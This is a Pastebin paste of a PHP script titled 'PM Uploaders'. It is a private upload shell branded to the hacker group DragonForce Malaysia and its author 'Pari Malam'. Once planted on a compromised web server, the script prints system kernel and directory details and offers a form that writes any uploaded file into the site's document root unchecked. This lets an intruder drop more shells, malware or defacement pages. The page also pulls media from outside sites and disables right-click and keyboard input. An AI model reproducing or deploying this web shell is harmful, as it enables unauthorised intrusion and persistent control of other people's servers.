Advertisement
Banglasia

[PHP] PM Uploaders

Feb 5th, 2023
893
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.37 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en">
  3.     <title>Supp Bruhh?</title>
  4. <head>
  5.         <link rel="shortcut icon" href="http://amritresort.in/tikus.gif">
  6.         <link rel="icon" type="image/png" href="https://mambang-edge.dragonforce.io/data/assets/logo/32x32-01.png" sizes="32x32" />
  7.         <link rel="apple-touch-icon" href="https://mambang-edge.dragonforce.io/data/assets/logo/maskable_icon_x192.png">
  8.         <meta property="og:site_name" content="Dragon Force Malaysia" />
  9.         <meta property="og:title" content="Pari Malam" />
  10.         <meta property="og:description" content="w00t! w00t!">  
  11.         <meta property="og:image" content="http://amritresort.in/tikus.gif">
  12.         <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
  13.         <meta name="keywords" content="DragonForce Malaysia" />
  14.         <meta name="author" content="Pari Malam" />
  15.         <meta name=googlebot content="all,index,follow">
  16.         <meta name=allow-search content="yes">
  17.         <meta name=audience content="all">
  18.         <meta name="robots" content="index, follow">
  19.         <meta name="viewport" content="width=device-width, initial-scale=1.0">
  20.         <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
  21.         <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'/>
  22.  
  23.  
  24. <style type="text/css">
  25. html {
  26.     text-align: center;
  27. }
  28. a {
  29.     text-decoration: none;
  30.     color: white;
  31. }
  32. </style>
  33. <body bgcolor="black">
  34. <center><br><img src="https://mambang-edge.dragonforce.io/data/assets/logo/maskable_icon_x192.png" width="250" height="250"><center><br>
  35. <font face= "Courier New">
  36. <font color='red' face='Courier New' font size="4px">Priv8 Uploaders By Pari Malam</font></b><center><br>
  37. <?php
  38. echo '<big><font color="white" size="4px"> Kernel: <span style="color: yellow;">'.php_uname().'</font></span></big><br>';
  39. echo '<big><font color="white" size="4px"> Directory: <span style="color: yellow;">'.getcwd().'</font></span></big><br>';
  40. echo "<big><font color='white' size='4px'> Ur Noob IP Address: <span style='color: yellow;'>".$_SERVER['REMOTE_ADDR']."</big></font><br><br>";
  41. echo "<form method='post' enctype='multipart/form-data'>
  42.       <input type='file' name='just_file'>
  43.       <input type='submit' name='upload' value='w00t!'>
  44.       </form>
  45.       </center>";
  46. $root = $_SERVER['DOCUMENT_ROOT'];
  47. $files = $_FILES['just_file']['name'];
  48. $dest = $root.'/'.$files;
  49. if(isset($_POST['upload'])) {
  50.     if(is_writable($root)) {
  51.         if(@copy($_FILES['just_file']['tmp_name'], $dest)) {
  52.             $web = "http://".$_SERVER['HTTP_HOST']."/";
  53.             echo "<font color='lime'w00t! => <a href='$web$files' target='_blank'><br><b><u>$web/$files</u></b></a></br>";
  54.         } else {
  55.             echo "<font color='red'Failed!";
  56.         }
  57.     } else {
  58.         if(@copy($_FILES['just_file']['tmp_name'], $files)) {
  59.             echo "w00t! => <b>$files</b>";
  60.         } else {
  61.             echo "Failed!";
  62.         }
  63.     }
  64. }
  65. ?>
  66. </body>
  67. <br>
  68. <body style="background-image: url('http://37.media.tumblr.com/tumblr_lnsltuqkgo1qfn9vko1_500.gif'); background-repeat: no-repeat; background-size: 100% 100%; background-position: center; background-attachment: fixed; oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body">
  69. <video autoplay loop allowscriptaccess='always' allowfullscreen='false' width='1' height='0' >
  70. <audio src="http://cancerinfotw.org/images/liyakun.mp3" autoplay="true" id="lagu" loop=""></audio>
  71.  
  72. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement